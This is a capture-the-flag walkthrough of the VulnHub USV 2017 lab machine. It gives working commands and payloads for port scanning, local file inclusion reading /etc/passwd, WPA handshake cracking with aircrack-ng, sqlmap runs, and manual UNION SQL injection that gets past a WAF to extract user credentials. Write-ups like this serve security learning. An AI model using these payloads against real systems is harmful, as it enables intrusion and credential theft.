USV2017 – Writeup

Details

This machine is https://www.vulnhub.com/entry/usv-2017,219/

Recon Phase

I first had to locate the machine on the network, so using nmap I scanned for it

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00040s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00028s latency).
MAC Address: 08:00:27:25:DB:68 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00025s latency).
MAC Address: 08:00:27:C5:25:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds

This indicated that the machine is running on 192.168.56.102

root@kali:~# nmap -sV 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00010s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE        VERSION
21/tcp   open  ftp            ProFTPD 1.3.5b
22/tcp   open  ssh            OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp   open  http           Apache httpd
5222/tcp open  jabber         ejabberd (Protocol 1.0)
5269/tcp open  jabber         ejabberd
5280/tcp open  ssl/xmpp-bosh?
MAC Address: 08:00:27:C5:25:00 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.60 seconds

Flag Hunting

I started by navigating to http://192.168.56.102 in browser in order to see what was running on the webserver

Screenshot 1

With nothing helpful available here, I got dirbuster setup

Screenshot 2

And waited for it to complete

Screenshot 3

I then headed over to the /admin2 url to see what I could find

Screenshot 4

Here I inspected the source code and found

var _0xeb5f=["\x76\x61\x6C\x75\x65","\x70\x61\x73\x73\x69\x6E\x70","\x70\x61\x73\x73\x77\x6F\x72\x64","\x66\x6F\x72\x6D\x73","\x63\x6F\x6C\x6F\x72","\x73\x74\x79\x6C\x65","\x76\x61\x6C\x69\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x67\x72\x65\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x49\x74\x61\x6C\x79\x3A","\x72\x65\x64","\x49\x6E\x63\x6F\x72\x72\x65\x63\x74\x21"];function validate(){var _0xb252x2=123211;var _0xb252x3=3422543454;var _0xb252x4=document[_0xeb5f[3]][_0xeb5f[2]][_0xeb5f[1]][_0xeb5f[0]];var _0xb252x5=md5(_0xb252x4);_0xb252x4+= 4469;_0xb252x4-= 234562221224;_0xb252x4*= 1988;_0xb252x2-= 2404;_0xb252x3+= 2980097;if(_0xb252x4== 1079950212331060){document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[8];document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[10]+ _0xb252x5}else {document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[5]][_0xeb5f[4]]= _0xeb5f[11];document[_0xeb5f[7]](_0xeb5f[6])[_0xeb5f[9]]= _0xeb5f[12]};return false}

I put this into http://jsbeautifier.org/ to make it readable and found

function validate() {
    var _0xb252x2 = 123211;
    var _0xb252x3 = 3422543454;
    var _0xb252x4 = document['forms']['password']['passinp']['value'];
    var _0xb252x5 = md5(_0xb252x4);
    _0xb252x4 += 4469;
    _0xb252x4 -= 234562221224;
    _0xb252x4 *= 1988;
    _0xb252x2 -= 2404;
    _0xb252x3 += 2980097;
    if (_0xb252x4 == 1079950212331060) {
        document['getElementById']('valid')['style']['color'] = 'green';
        document['getElementById']('valid')['innerHTML'] = 'Italy:' + _0xb252x5
    } else {
        document['getElementById']('valid')['style']['color'] = 'red';
        document['getElementById']('valid')['innerHTML'] = 'Incorrect!'
    };
    return false

By inspecting the code here. I could see that

md5(_0xb252x4)

Would generate the flag for Italy, and I could skip straight to that if I wanted to. I could also see the correct way to get the flag was to enter a value which would be used for _0xb252x4 which when a series of things are applied to it equals 1079950212331060. The relevant code was

_0xb252x4 += 4469;
_0xb252x4 -= 234562221224;
_0xb252x4 *= 1988;

Which led to the formula

(x + 4469 - 234562221224) * 1988 = 1079950212331060
x = 77779673

I then tried entering this as the password

Screenshot 5

This gave the flag

Italy:46202df2ae6c46db8efc0af148370a78

From here I ended up doing another nmap scan on a wider range of ports

root@kali:~# nmap -sV -p- 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00012s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE        VERSION
21/tcp    open  ftp            ProFTPD 1.3.5b
22/tcp    open  ssh            OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp    open  http           Apache httpd
4369/tcp  open  epmd           Erlang Port Mapper Daemon
5222/tcp  open  jabber         ejabberd (Protocol 1.0)
5269/tcp  open  jabber         ejabberd
5280/tcp  open  ssl/xmpp-bosh?
15020/tcp open  ssl/http       Apache httpd
33469/tcp open  unknown
MAC Address: 08:00:27:C5:25:00 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.02 seconds

There is another webserver on port 15020, it is running ssl so I navigate to https://192.168.56.102:15020

Screenshot 6

It seems there was an issue with the cert, so I take a look

Screenshot 7

I put the cert into https://www.sslshopper.com/

Screenshot 8

It can be seen the country is labelled as France and the issuer is another md5 hash, this is a flag

France:a51f0eda836e4461c3316a2ec9dad743

I then accept the cert and move onto see what the server is providing

Screenshot 9

Screenshot 10

I setup another round of dirbuster

Screenshot 11

And wait until it finishes

Screenshot 12

Next I checked out the blog section

Screenshot 13

Screenshot 14

I notice in the source, a commented out link to /blog/download.php so I check that out

Screenshot 15

When I visit it, I am told there is a missing param

Screenshot 16

I may be able to exploit this for local file inclusion, but first I need a file to include. So I began to dig around in the posts

Screenshot 17

Until I find there is a comment on the post with id 3

Screenshot 18

Here kevin said he keeps a flag.txt in is house, this seemed like a thinly veiled reference to a home directory. I decided to try /home/kevin/flag.txt as a local file inclusion target on the previously found download.php. But first to confirm there is a vuln, I try to include /etc/passwd, if this works it will have the benefit of giving me a list of users so I will be able to confirm if /home/kevin exists. So I start by navigating to https://192.168.56.102:15020/blog/download.php?image=/etc/passwd

'image' parameter is empty. Please provide file path in 'image' parameter

This shows it was not a GET param, so I instead try POST via cURL

root@kali:~# curl -X POST -d "image=/etc/passwd" https://192.168.56.102:15020/blog/download.php
curl: (60) SSL certificate problem: self signed certificate
More details here: https://curl.haxx.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

The cert wasn't good, so I tried again using -k to tell cURL not to care about the cert

root@kali:~# curl -X POST -d "image=/etc/passwd" https://192.168.56.102:15020/blog/download.php -k
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
teo:x:1000:1000:teo,,,:/home/teo:/bin/bash
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false
kevin:x:1001:1001::/home/kevin:
epmd:x:110:113::/var/run/epmd:/bin/false
ejabberd:x:111:114::/var/lib/ejabberd:/bin/sh
oana:x:1002:1002::/home/oana:

So now I have confirmed local file inclusion, and a list of users confirming kevin's home directory location. So I attempt to access the flag.txt file

root@kali:~# curl -X POST -d "image=/home/kevin/flag.txt" https://192.168.56.102:15020/blog/download.php -k
Croatia: e4d49769b40647eddda2fe3041b9564c

And that is another flag, but with nothing else found on the blog I moved onto /vault found earlier by dirbuster

Screenshot 19

The folders went all the way to door 300, and then I went into one

Screenshot 20

And this went on vault 100. It was obvious I couldn't just check them all out manually, so I downloaded all of them

root@kali:~# wget https://192.168.56.102:15020/vault/ --no-check-certificate -r

I decided to then search for files within them

root@kali:~# find ./vault -type f

But this found far to many files but most of them were called index.html with some extra parts. So I tried again filtering these ones out

root@kali:~# find ./vault -type f -not 0name "*.html*"
./vault/Door223/Vault1/rockyou.zip
./vault/Door222/Vault70/ctf.cap

I started by inspecting rockyou.zip, as rockyou is the name of a common password list

root@kali:~# file ./vault/Door223/Vault1/rockyou.zip
rockyou.zip: Zip archive data, at least v2.0 to extract
root@kali:~# unzip ./vault/Door223/Vault1/rockyou.zip
inflating: rockyou.txt

I now had a copy of rockyou.txt, I ran a check to see if it was different from the one I had on my machine

root@kali:~# diff /usr/share/wordlists/rockyou.txt rockyou.txt
< /dev/null

There is very little difference between them. I guessed I was given this to use as a wordlist against the .cap file that was also provided. So I quickly inspected the cap file in wireshark, then fired up aircrack-ng

Screenshot 21

root@kali:~# aircrack-ng ./vault/Door222/Vault70/ctf.cap -w rockyou.txt
                                 Aircrack-ng 1.2
      [00:06:25] 3448484/9822768 keys tested (9132.66 k/s)
      Time left: 11 minutes, 38 seconds                         35.11%
                          KEY FOUND! [ minion.666 ]
      Master Key     : CA 8E A6 F3 BB 7F 29 CD D9 F8 91 43 CC 26 2D B6
                       8C 1A 05 1A 39 67 94 5A 60 81 E6 6F FF 91 0F 28
      Transient Key  : 9E DD C0 66 D0 3B 99 A5 9F 41 D6 F9 40 95 55 04
                       B1 87 ED 42 24 1A A2 6C B3 C5 36 D2 62 46 AB 28
                       92 D6 09 8D B8 69 23 C7 EB 2E 01 0E CB BB 40 36
                       6F 11 68 CC 99 80 DF 36 FC 8D 8A 48 50 88 F9 C1
      EAPOL HMAC     : FB C1 48 13 17 D1 EA 23 FE CF 93 52 97 0B 83 4A

Now I had a password, I attempted to use it on https://192.168.56.102:15020/blog/admin/login.php with the username kevin, but had no luck. So I tried again with creds admin:minion.666

Screenshot 22

And I was now on the admin panel and I checked out the source

Screenshot 23

Philippines: 551d3350f100afc6fac0e4b48d44d380

While digging around I notice that the url contains a param called id /blog/admin/edit.php?id=3 which when changed, changes the article which is displayed. Assuming this pulls from the db, it may be vulnerable to SQL injection. So I fire up sqlmap to check

root@kali:~# sqlmap -u https://192.168.56.102:15020/blog/admin/edit.php?id=3 --cookie="PHPSESSID=tasg9ahcp4klrb7qik0cva1fk0"

I then say "y" to most of the options it gives me

sqlmap identified the following injection point(s) with a total of 197 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9441=9441
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=3 AND 9458=BENCHMARK(5000000,MD5(0x42414650))
---
[18:07:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL <= 5.0.11

As this shows the system may be vulnerable, I fire sqlmap back up again, this time using exploit mode

root@kali:~# sqlmap -u https://192.168.56.102:15020/blog/admin/edit.php?id=3 --cookie="PHPSESSID=tasg9ahcp4klrb7qik0cva1fk0" -a

Again saying "y" to most options. It then suddenly crashes. Which I find weird. Eventually I find a command which gives me some output

root@kali:~# sqlmap -u https://192.168.56.102:15020/blog/admin/edit.php?id=3 --cookie="PHPSESSID=tasg9ahcp4klrb7qik0cva1fk0" --schema --tables --columns
Current database
[3 tables]
+----------+
| comments |
| posts    |
| users    |
+----------+
Database: blog
Table: users
[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| id        | numeric     |
| idcountry | numeric     |
| login     | non-numeric |
| password  | non-numeric |
| published | numeric     |
| text      | non-numeric |
| title     | non-numeric |
+-----------+-------------+

This means I had to carry out the attack manually, I stated by navigating to

https://192.168.56.102:15020/blog/admin/edit.php?id=3 order by <var>--

Where I incremented var from 1 upwards until the page change from

Screenshot 24

to

Screenshot 25

Which happened on var = 5, this indicated there are 4 columns being used. Next I wanted to use a UNION query to work out which columns are displayed to me so I navigated to

https://192.168.56.102:15020/blog/admin/edit.php?id=3%20union%20select%201,2,3,4--

I used 1,2,3,4 as it would be easy to identify them on the page.

Screenshot 26

This seemed to show something was blocking my query from executing as expected. And after a lot of googling I came to the conclusion that it was a WAF, and using https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF I was able to craft an alternative injection query

https://192.168.56.102:15020/blog/admin/edit.php?id=3 /*union*/union/*select*/select 1,2,3,4 --

Screenshot 27

This now showed the query was working, but it wasn't displaying the output. From this I thought it could be due to a limit on the query, so I added my own limit, and an offset so my result was displayed

 https://192.168.56.102:15020/blog/admin/edit.php?id=3 /*union*/union/*select*/select 1,2,3,4 limit 1,1 --

Screenshot 28

From this I could now conclude that to extract information, the columns I select must be in the position of 2 and 3 in 1,2,3,4. So next I update the injection to pull details for a user

https://192.168.56.102:15020/blog/admin/edit.php?id=3 /*union*/union/*select*/select 1,login,password,4 from users limit 1,1 --

Screenshot 29

I then further add to the query so I can enumerate users

https://192.168.56.102:15020/blog/admin/edit.php?id=3 /*union*/union/*select*/select 1,login,password,4 from users where id=<var> limit 1,1 --

I then begin incrementing the var starting at 1. Var = 1 showed me admin again, but var = 2 gave

Screenshot 30

Laos:66c578605c1c63db9e8f0aba923d0c12

And that is the last flag. This machine is completed!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.